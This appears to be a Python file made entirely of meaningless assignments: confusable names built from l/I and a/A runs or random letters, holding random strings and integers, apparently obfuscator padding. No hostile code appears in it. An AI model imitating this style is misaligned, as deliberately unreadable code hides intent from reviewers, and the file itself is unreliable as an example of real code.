lFacKzWXGRSgHxAChUsaQiwZZBVhyOsgCamNudlzdojWzUIVaOViQrqLFUVDRkYWfdLoylGfEICUSUz338 = "TIRRiIIINZYLbdhLYuTUobOMyuJqRTqjwcsjpYGPYqbUuAPluhHZcVzaFcLKYCWuVjMLPtYcWMfsIGb"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa = "dhTaAefTXqWVoBomtQvAUYgfmgkqLFROatlHiwiQotjojuxLMdVbEHfgIgkudzXGZeXFupeGOzIPFUi"
aAaAAAAaAAaAAAAaAaaAAAAAaAaAaaAaAaaaaAaAaAAaaaaAAaAaaaaaaAAaAAaaaAaAAaAaaAaaaAAAAAAaAaaaaaaAAAaaAaaAaAaaAAaaAaaAAAaaaaaAaaAAAaAAaaaAAaAAAaaAAAaaAaAaAAAaaAaAaAaaAaaaaAaaAaAAAaaaaAaAaAaAaAaaaAAAaAAaAaaAaAAaaaaAAAaAAaAAAaAaaAaAaaaaaaAaAAAAaaAAaaaAAAaAAAAaaAAaAAaaAAAaaaaAaAAaAaAaAAAaaaAaAaAaaaAAaAaAAAaaaaAAaaAAAAaaAaaAaaAAaaaAaAaAaAaAAa = 210
aAAAAAAaaAaAaaAAaAAAaaaAAaaaAAaaaAAAaaAaaAAaAaaAaAAaaaaAAaAaaaAAAaaaAAaAAaaAAaaaaaAAaaAaaAAaAAAAAAAaAaaaaaaaaAaaaaaAaaAaAaAAaAAAaAaaAAAAaAaAAaaAaaAaaAAaAAaaaAaAAAaaAAaAaAaaaAAaAaAaaAaAAaAAAAaaaaaAAaaaAaaAAAAaAaaAAaAAAAaAAAAAAAaaAaaAAaAaAaaaAaAAaaaaaAaAAaAAaaaaaAAAaaaaAAaaaAaAAAAaAaAAAAaaAAaaaAAaaaAaaaAaAAAaAaaAaaAAAaaAAaaAaaAaaaAA = 437
q16790034943484292330 = 491
IIIllllIlllllIlIIllIIlIIlIllllIIlIllIIIlllIlIlIlIIIllllIlIlIIIllIllIlllIlIIIlIIIllllIlIllIlllIlIlIlIlIlIIlllIlIIIIlIIlIlIllIlIIlIIIIIlllllIIIIIllllIIIllllllllllIIllIIllIlIlIIIIIIllIIllIllIllIIlIIllllIlllIlIIlIIlllIIllIlIllIlllIllIllllllIIlIllIllllIIIIIIIlllIlllllIlIIlIllIlIIIlIlllIlIllIIIIIlIlIllllllIIIlllIlIIIIIIIIlIllIIIIlII = "lMznyVkwmYtYDoTKhVhkPuCjvpqsPvnuyMhLRnrVnlpcRsnvnpgVFKpJIXnzoQqChObvpMeersNtZkR"
A16790034943474355326 = 615
IIIIlIIIlIIlllIIlIlllllIIlllIlIlIIIIIIIIIlIlIIllllIlIllIIlIlIlIllIIIllIIIIIIlIllIllIIlIIIIIlIllIIllIlIIIIlIIIIlIllllllIIllllllIlllIlllIlIllIIllIIllIIlIIllllllllIIllllIlllIIIlIllIIlIIllIIlllIlIIIlIllIllIllIlIIlIlIIIlIIIllIlIlIlllllIllllIlIIIlIIlllllIIlIIlllIllllIlIIIIIlIllIIIlIIlIIlllllIlIlIIlIIlIIlllIIIlIlIlllllIllllllllIl = 403
llIlIlIlllIlIlIlIlIIllllIIIIIllIIIIIlIllIIIIIIIlIIIlIlIIIlIlIIlIlllIIllllIlIIIlIllIllIlIllIlIIlIIlIllIlIIlllIllllIIIllIlIIIIlIIlIIlIIIIlIIIlIIIIIlllIIIlIIIIllllllIIIllIIllIlIlIlIIllIIIlIIIlIIIlIIlllIIllllIIIlIlIlIIIIIIlIIIIIIlIlIIlIIlIlIllIIIllIllIlIIIIllIlllIIIllIlIIlIIlIIlIlIlIlIllIIlIIlllIllllllIIlIIIllIllIIlIIIllIllI = "aEdsrwOigybTERjgdSPMGUngWPrIxYRQVOCtGeGZaNmSjmSwVrqswWNLlkfTqseDMqkspPnDFEcwnEJ"
s320 = "ctsGsdjEEuUaogucOlkcxrRvofZBqtPbHbrQoKvmAYIHcMugwhOfFkOiXSltKKiwSBNZevdMYoSYMPu"
ySNaBsCRBjiZDZHzezLCGfovCYxrScQiLiWXisEpdEKOKDQwYGlaxPhWUIFajvphjZbWJLzJWRQDttn318 = 232
BXvWyXSAttNETEpAwPEIaUjwYshNTTcFlgluZNaSTSEkzgdKvVRirjssfoLvpjPLmTvpEJfDOKlQTYb316 = 233
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb = "LEcNOHCXKvOsjZplcGmUIQVGEbctmVbnljntMulzCyjaPKkKxOKcuVPLHYymDxSXrgWAqJxIpCUxguc"
QtoxSriLIYNWatyUMjABKOiyrBrLRfJamIdkidagNHXlPMmBeyKtwGPojLJlqCMlPuKjgikPYnFUgjm312 = "RdeyKOElqTQxaoKCCdniQucfDmHrQusEEunzhvKGejNNaSfsGHiCmjlCBpjnTavUZMbMyTScUNSqwTK"
IIllllIIlIllIlIIlIIlIllIIlIlIlllIIIIllllIIlIIIllIllllIlIIlIIlllllIIllIlllIIIlIllIlIIlIIlIIlIIIlllIIllIIIIlllIlllIIIllllllIIllIlIllIIlIIllIIllllIlIIlIIllllIllIIIIlIIIllIlIllIIllIlIllIIIIlIIIIlIlIlIlllllIIlIlIlllIIIIlllIlllIlIlllIllIlIIIllllIlllllIIIIlIlIlIlIlIlIIIIIlIIlllIllllllIIlllIIIllIIIlIIIlllIIIllIIllIll = "EtlsHNLgwCYhWZlguOQXmxubMGWCTsjpHlxxqehczhmumXKFmGOWbANcqmGJNFOqtakfSgFsJjCoiKF"
AaaAAaAaaAAaaaaAaAAAAaaaaAaaaAAaAAaaaAaaaAAaAAaAaAAAAaaAaAAaaaaaAaaaAAaaAAaaaAaAAaAAAaaAaaAAAAAAAaAAAAaaAaAAAAaaAAaaaaaaAaaAAAaaAaaAaAAaAaaaaaaAAAAAaAaaAAaaAAAAaAAaAaAAAAaAaAaaaaAAAAAAaAAAAaaaAAAAAAAAaAAaaaaAAAaaaAAaAAaAAAaaAAaAAAAaaAAaaAAAAAAaaaAAAAAAaaAAAaAAAaAaaaAaAaAaaAAAaAaAaaAAaAaaaAAaAAAAaaAAAAAaAaAA = "etFLMzewtSeAdWcVyQpGOuRAeFhoBqJwXNjWuCyxKdcTFaYEtZyKSLnKKNPUudhiqzrIVOhjiugRcZs"
YskoZCiWregZhTKTLCirNCuhINrogwfaurUkimKBgjnYMtWZRAEvKZyVihgQnuVUBMxhJzoVmgfneJg306 = "MqbjQyoglCnUgdoijLzpzFvQuVhEjTqdFwebxJtYwhDTfrllJDvuOjGhkzcoVAQJetAUyhaOIeEaFIk"
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = "ILdHWkTpvWIdnBKBhWfUVDQAzVUFjKuAGYrgCSjtOmCQOUVajdauHOkbRjhegVFRDWauPadClboogZL"
lllIIIIlIIlIIlllIIllIlllIIllIllIlIlIlIlIlIlllIIIIlIlIlllIIlIIlllIlIIIIIIlllIIllIllIIlIllllIIlllIllllIlIlIIIIIllIIlIIIIIlllIIIlIIlIlllIIlIlllllIIIIlIIIIlIIIIlIIIllIIIIIllllIlllIIIIlIIIlIllIlIIllIllIIlllIIIIIlllIllIllIIIIIlllllllIIllIllIIIlIllIllllllIIIIlllIIlllIIlIlIlIlIIIIIllllIlllIlIlIllIIIIIIlIlllIl = 589
kgSmBGYaRTNyKtLQHiOpseCLsnKnXJsWXjmjmOphcXmNDtUSQUPDTaoDXHpZhHXDtCISRBYtnCzOfGd300 = "dtMAaIdENHDvaPtstkwtQfmSGISjRkNDNXznzRXCnmwfizVJuopjaZYiTpjTtIDsjeeocSKkcIMnSmr"
Q298 = "goRpWbuvgCucjQeKuyUZgFhSwvukrGOMSZnPEtznzIsjGovcTZKApwtRnBVlSefTFjMSkQASWOguQcI"
x16790034943459089296 = 520
aaAAaaaAAAaAAaAAAAaAaAAAAaaAaAaaaAaAaAaAaaAaaAaaAaAaaAAAaaAAAaaAaAaaAAAaAaAAAAaaAaaAaAaAaAAAAaaaaaaAaAAaaaaAaAAaAAaAAaAAAAAAaAaAAaAAAaaAAaaAAAaAaAAaaAaaaAaAaaaaAAAaAaAAaAAAAAaAAaAAAaaaAaAaaAAAaaaAAaAaAAaAaaAAaaAAAaaAAaaaaaAAAAAAaaAaaaaAaAaaAAaAaaaaAaAaaAAaAaAAaAAaaAAAaAAaAAAAaAaaAaAaAaAaaaAaAA = "nzoyMThOVukluXOAsWVeknpYDKLTJHhRydhxryoYGpxOTkSjMCviDBHIYrvNXwOyCnluLoTVMKJgwNn"
lIllIIllIlIlllIIIlIIIIIIIllllIlIIllIIlIIlllIIlIIIIIlllllIIIllIlllIlIlIIIllllIIIIIIIIlllllllllIlIlIIlIIIIllIIlIIIlIlllllllIIIlIIlIlIllIIIIIllllllllIIlIlIlIIlllIllIIIIlIIlIIllIlIIllIIllllllIIIIIIlIlIlIIIIIllIIIIIlllIllIlIlIlIIlIIIlIllIIlIlllIlIIIllIlIIIIlllIIIIIlllIIIlIIIllIlIlIIIIIIIIIIIIlIlI = 290
IIllllllIIllIIllIIIIlllIlllIllIIIllllllllIllIlIlIIlIIllIIIIlIlIIIIIIIlIlllIllIlIllIlIlIlIIIIIlIIllIlIIIlIIllIllIIlllIIllIlIllllllllIIllIIlIllIIIIlIllIIIllIIIlIlllllIIIlIlIllIIIlIIllIIIlllIIlllIIllIIllllIlIlIIIllIIIlIIIIllIIIIlllllIIIlIllIIIIIIIIlIIIIllllIIIlIllIlIllIlllIlllIIIllllIIIIIIlIl = "QITQkeDOhokRtMJswhrxYiALvMrJTaiqXsdeNCgpGbOblcDjvRftigtVkZgBoqyguJdgrxNXWHRQdSo"
AaAAAaaAAaaaAaaaaaAaAAAAaAAAaaAAAAaaaAAaAaaAaaaaaAAAaaaaAaAAAaaAaAAAAaaAaaaaaAaaAAaaAAaaaaaAAaaAAAAaAAAaaaAaAaaaaaaAAAAAAaaAaaaAaAaaaAAAaAaAaAaaAaAaAAaaaAAaaAAaAAAAaAaaaAaaaaAaaAAaAaAaaAAAaAAaAAaAaaaAAAaaAAAAAaAaAAaaAaaaaAAaAAAaaAaAAaaAaaaaAAaaaaAAAaaaAaaAAAAAaaaaaAaAaAAAAAaaAAaAAaAAaAaA = 842
f286 = "saFFyTPefrIbxHpsHrRmLAUPjSCrEabrubvpPAbjMwhqLoylsmeqwujOLwNdOTSDWfyarXpwlrVscTa"
aAAAAaAaaaaAAaAaAaaaAAAaaAaaaaAAaAaaaaAAAaAAAaaAaAaaaAAAaaAaAAAAAAaAaAAAAaAaAAaaAaaAaAAaAAaaAAAaAaaaaaaAaAaaaaAaAaaaAAAaAaaaAaaAaaAAAAAAAAAAaaAaAAaAaAAaaAaAaAAaaAaaaAAAAAAaAAAAAaaaaaaAaaAaaAaAAAAAAAaaAAAaAaAAaAaAAAaaAaaaAaaAaAaaaaaaAAAAaaAAaAaaaaAAAAaaAaaaAAAaAAAaaAaAaAaAAaAAaaAaaaaa = "OEXhePthVwYwdZrKYbjesiYEBSDeJApdGTblzpbaOvAehJHdpzANznYfmvxRdeKbwXtCTILYFHkzDPy"
llllIIlllllIIllIlIIllIIlIIIIllIIIIlIlIIIIIIIIIIIllIIlIlIIlllIllIllIllIIlIlIlIIIIIIIlIIIIIlIlllIIllIlIIIIIllllIllIlIIllIIIIlllllllIllIlIIIllIIlllIIllIlIlllllIIllIlllIIllllllIIlIlllIlIIIIlIIIIllIlIlllllIllIlllIIIIlIIlIIllIlIllllIllIlllIlIllIlIlllIIIlIllIIIIIlllIIIIIIIIlIIlIlIIIlIlIII = "joHZXyEFGPrscdAaekUZYPhdQLJSysxlDjeFwzlBlTsjiMLuAIYhUEsjGQPWkWsCwWFogRAyTjEVKVz"
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy = 120
l278 = "IOkzLFjDqaZgGAehXMhAyRUiaZpqMWNzboWaumsHVxNdCCfiooqaYBlDRwSmhVmlnPrKGpexPxcmfLj"
I276 = 653
d274 = "BUAXHCPjJGqCAbuvQfLLKIrVFuXCLHQrnDzgqHBLjyzFBhUVHoyZXFzbkPrDxNEfgkqlePgCPgvAQza"
X272 = "iNakCWAQBaBLiKnMDxDVUWLVAvQZnGijmickFwNsQQDRtVKTMlUTXcyKaGLuNHRZwbVSGwyaZQxRQFI"
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF = 206
dadhmrKVirouqRPBfNwuTjifPXJCaQiWiWApRNVnfzSHTcMQCHWphWszMkhQtZefKGmqQqLoEuPAFFQ268 = 602
llIllIIlIllIllIIIlIlIllIlllIIllIlIIIIlIIIIllIlIllIIIllIIlIlIlIlIIIIIlIIIlIIlIIllIIlIllIIlllIlIIlIllIlllllIIlIIllIlIIlIlIlllIIlIIlIlIlIlllllIlIllIIlIIIIlIIlIllllIIlllllIlIlllIIIllIllIIIIlllllIllIlIlIlIIIllIIllIlIlIIIIlllIIlIlIIlIIlllIIlIllIIlIIllIlIllIIIIlIIlIIllIIlI = 258
IIlIIIIIlIIlIIlIlIIllIlIIlIlIlIlllllIllIllIIIIlllllIlIIlIIlIlllIIIIllIIllIlIlllllIIllIIIlIlllllIIlIIIlIlIIIlllIIlllIlllIIIIIIlIlllIIlIIlIllllllllIlIIllllIIlllllIIIIIIlIllllIIIllIIlIllllIIllIllIIlllIIlIlIlllIIlIlIIlIlllllIllIIllIlllIllIIlIIIIlIIIIIIlIIllIlllIllIlIl = "sodUpFsOVTCFvZqWRvUrjhgGRGtZhjWZwFZpGkCkNFuMMdaEBaVnWkMdwxTeTPQSmlcMivnvqsCVmOx"
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG = "ArzMHkSKEONnFjZuVNmYUYIqbtsTMtdodEHiwVmwdnFSIjQyWVSHvnQwVaCEJKTNbEsJotYBnaICEbu"
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII = 687
sZRmaCzWXjkUVgQgBTFTWUOlzjftxccmCRMXhaPeCyObiXBCCWDzsffQWhzITjxbfiWlHVTelSjxLaY258 = 670
M256 = "wIzuCcOUHiBIVLkbqLBvDbDbILNxpcNPnZZQZDrrIaMpBWBZgjLkhwDjGnhcJnDuVCSoTCHObPkANnh"
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS = "PcpVOvaSYwsRvWkiWMnCamJkNMIwUcrKbppKBocwoudrZwcTtuZrGkDyhLqMMOtUlExpMUqOaiqegnp"
AAaaAAaAAAAAAAAAaAAAAAAaAAAAaAaAAaaAAaAaaaAAAAaAAAAaAaaAAaaaaaaAAaAaAAaaAAAAAaaAaaAAAAAaaaaAaaaaAAaaaaaaaAAaaAaaAAAAAAAAaaAaaAAAAaaAaaaAAAAaaAAaAAAAAaaaaAaaAAAaAAAAAaaaaAAAAaaaaaAaaaAAaAaAaaAAaaAAaAaaAAaAaAaaaAAaaAaaAAAAAaaAaaAAAaaaAAaaAAaAAAaaAaAAAaaa = "iVBNEVsogXbrCNRdEOeBvJRorGtawCLlQicuCiNMEZBueUxZuAAFlCujFKHEclwgSXNrxQPcgNUvvHc"
i16790034943439262250 = 241
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD = 725
HpfQyyptyeHfIdPIFrdpfdBeolCvMzEHKgWMzEcdqZWNUKLxpWqrVpbnwUfOksSwLrQFRSRMOFWHQkj246 = "kApFIusdDAeNzcgvCKumZVcSUIJdhBYQvVhQIQkWlYyuAeKKDeSNbAhZYOsWBdInMNzwCAJDfHLeCjD"
llIlIIIIIIlIIlllllIIIIIIIllIllIIllIIlIlIlIIlIIlIIIlIlIllIIlIIlIllIIIlIIIlIIllllIlIlIIIIIIIIllIllIIlIIIllIllIlIIIIIlIIlIlIIIllIIlIllllIIllIIllIIllIIIlllllllllIlIIllllIlIIIllIIllIlllIIIIIIIllIllIIllIIIllIIllIllIlIIIIlIlIlIlIllIlIIlllIIIlIllllIlll = 794
lIlIlIIllIIlIIIIIlIIIlIlIIlllllIIlllIIllIIIIlIIlIllllIlIIIIlIlIIlIIllIIIIlllIlIlIIIllIIIIllllIlIlIlIIllIlIIIlIIIllIlIIlIIlIIlIIIlIIlIIlIlIlIlIIlllIlIIIlIIllIlIIlIIIlIllIllllIIllIllllIlIIIIlIIIIllllIIIllIlIIIIllIlIIllllIIIIllllIIlIlllllIlIIlll = 629
p16790034943432307240 = 506
OJhBssCLhoNYqSrBtMNceACjhkQsyRVXnHJmPoTOtJBWbRRIUPAcFBQYWjEEGXHelGuvbBtKzNhJfIr238 = "jLkdUJRKvuPJCIhbEDPzuJSKwrXGZEwPMGEeKGjEMYBJPfQSgXevPIbJeqLznVOrVORbLePwDgiqMlt"
ZjIVxclXUWdniYRXYPwdgUyhHGiDlHyfAWleVKsNuyWelHfktrpgQqXERhfDbUBubFrdoBUJIEpQogk236 = "JOmOgqhCimjDsLgunlEXeHlPjsvAiMxvezxXzeROnFSMSieouaKQxVjjnIeuGFuahSQzUwRHTfGmUmH"
X16790034943432307234 = "ARvhgCKMPzpagAnRBLjAwLVydBojmBAyoGXWYzAgCKoJgFvdehsCWwIxpEUiySjgTLeFQWrZRnCxDBe"
R232 = "OrGVzhMeZcpWOVtPLynZBOHMssFVqGpJRKFveLoXaPYwBmzwaHnSRGXnWWNfSHGVlZradYVVageFmCQ"
aAAAaaaAaaAaaaaAAaaaaAAaaaAaaAAAaAAaAAAAAaaaAAAAAAaaaAaAaAAaaAaaAAaAaaaaAaAAaaAaaaaaAAaaaaAAAaaAaaaAaaaAaaaAaAAaaAaaaAAaaAAAaaaaaaaAaaAAaaAaaAAAaAAAAAAaaaAaaAaaaaaaAAaaAAAAaaaAaAAaaAAAAAaAaaaaAaAaaAAAaaaAaaAAAaaaaaaaAAaAaAAaAaaaAa = 160
aaAAAAAAaAaaAAAaaAAAaaAAaAaAaAAaaAAaaaaAAaAAAAAaAAAaAaAAaAAAAAaAAAAAaaAAAAaAaaAAAAaAaAAAAaaaaaaaAaaaAaaAAAaaaaaAAAaAaaAaaaAaAaAaaaAAAAAAaaaAAAAaaaaaaAAaAAaAaaAaaaaAaaAaaAAaaaAAAAaaaAAaaAaAaaaAaaAaaAaaaAaAaaaaaaaaaaaaaaAaAAAaAaAa = "iwaALqyYRQOxljdNyjAtMMIpHUNBFEpvJnvLrqkJDbhiXyjbTJFddyglNMTAULnKAIRxhchNBlFAIDC"
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh = 308
gGSQbNbImaPtoFyPhTSuUOaguNERpJPjngCTIbXhvkRAkUyGtYFvbaqbqlrVWEyPeuvcHcQcgDlIggb224 = "uWSGJlEELYzGTdGbifUpzmGXDCEvfQdygtvXqKisNdAvLmWGyzkWWvoAOibOAbKrBdqQCQVlTIuijpV"
E222 = 258
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm = "gormnEVecqpolXPkFNZMvjShfLHexgGYtahgjneEukIYXfwvbZYuAEbYMNyLXlTelztKxiXcKOWtUyJ"
aAaaaAaaAaAAaAaaaaaAAAAaAaAaAAAaAaaAaAAAaAaaAaAaAAAAAaAAaAaAaAaaAAAaAAAAaAaaaAaaAAaaAAAAaaaaAAAAaaaaaaaAAAaaAAAAaaaAAaaAAaAAAAAaaaaAAaAAaAAAaaAAAAaAAAAAAaaaAAAAaaAAaaAaaaAaaAAAaAaaaaaaaAaaaAAAAaaaaAaaAaAAAaaaAaAAaAaAAA = 123
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr = "FwKHraidMHaCJgSDHTOIJTJOqHrlUANSfqNvQboLBgVisliIENRUuoArpmPsTnBkpQQxamKbyXUgAlR"
H16790034943422418214 = "sLLWqysZnSeTyVzbfjIGTKJRNgbAwsNTdbvciexgOxBoFrNpQCxPgSSPrbKPnCEnWGAgWekZvuSaDmh"
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp = "WbNVVxpTrhxPYatvCSWYKdzwydbRgfjDqzqphYgCHwJyhwNDxOAEjMSrgpFLvPxHglMYlQYEiEXRFvR"
v210 = 421
oFrBkZxjsemTzwtWogeSduUpNbLljgVaEMLoixJEfffLymxJSLKAuHqkBATcaYnjVjSCDEqTCBWeZRL208 = 600
AaaAaAAaAaAaaaaaaaaAaaaaAaaAAaAaaAaAaaaaAaAaAaAAAAAAAaaaAAAAaaaaaaaAAaAAAAaaaAaAaAaAaaAaaaaAAaaaAaaAaAaaaAAaaaAAaAAaAaaAaaaAAaaaaAaAAaAAAAAaaAaaAaaAaAaaAAAaAaaaaaAAAaAaAAaAAAaAaAaaaAaaaaaaAaaaAaaAaAAAAAAAAA = 150
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = 722
BrUlQbjQVNXqcfDuVfqRPmGjLfXdEqwYgKpfJeQObTVWmgRJfqwgvSVPDpycGLApHARfkImwUFqcmJy202 = 505
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM = 413
AAaaAaaaAaAaaAAaAaaaAAAaaaaaaaaaAaAAaaaAAAAaaaAaAAaaAAaAAAaaaAaaAAaaAaaAAaAAAaaAAaaAaaaAAaaaaaaAAaaAaaAAAaAAAAAaAaaaAaAaAaAAAaAaaAAaAaaAaAaAaaaAaaAAaaAaaAAAAAAAAaAaAaaAAaaaaAaAAAaaAaAaaAaAaAaAAAAaaa = 589
KodBAqnikuJoJBFzPChKjYmNYYQagdWATHrMQrXiLGNGZdSHSvbpdlwkXWMtNrOjcCDzJaWANdEeUdL196 = "swvVRhXXPRVpLlrriCUqgcPekiZhuLFJRVjzGdwJacJpDCkHTSibiKrCXpiczSUVpZoUDVAoMLENQnP"
N194 = 288
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW = 508
AaaaaAAAAaAAaAAaaaaaAAaaaAaAaAaAaAAaaaaAAAAaaAAAAaAaaaaAAaAAAaAaaaaaAAaaAaAaaaaAaaaAaaaaAAAAaAAaaAaAaAAaaaaaAaaAAAAaaaaAaAaAAAAAAAaaAaAaaAaAaaAAaaAaAaAAaAaaaAAaAAAAAaaAAaaaAaAaaaaAaAaAaaaAAA = "BFqeyJyxVVKIglEaeSCkDvySfUdtXVmTrGWgmeHliLGhImZdNdBcmtZiWCMFhRxqCibRbHvuaGGXYRv"
IllllIllllIIIllIlllIlllIIIlllIIlIIllIIIllIlIlIlIIlIIIIlIllllIllllIlllllIllllIIlIlIlllllIIIIlIIlllIlIIlIlIIIIllIIllIllIlIIIlllllIIIIlIIIlIIllIIlIIllIlllIllIIIllIlIlIllIIllIIIIllIIllIIIIlIIl = 591
tyNlWaaiLnfJnpzOurGEUbdwtCXgmdzMoDUooIyuSNsPPtOgCdTXChBSmgEVoQBBUCamVdJmdcjjkwp186 = 377
lIllllIIIIlllllllIIIlIlllIIIIIIlIlIlIIllIIlllllllIIIlIlIIllIIlIIlIlIlIIlllllllIIIlIlIIllIlIllIIIlIlIIllIIIIllIlllIIIIllIIIlIllIIlIllIIlIIlIlIIlIllIIllIIlIIlIIIIIllIlIIIlIlIIlIIIIIlIlII = 252
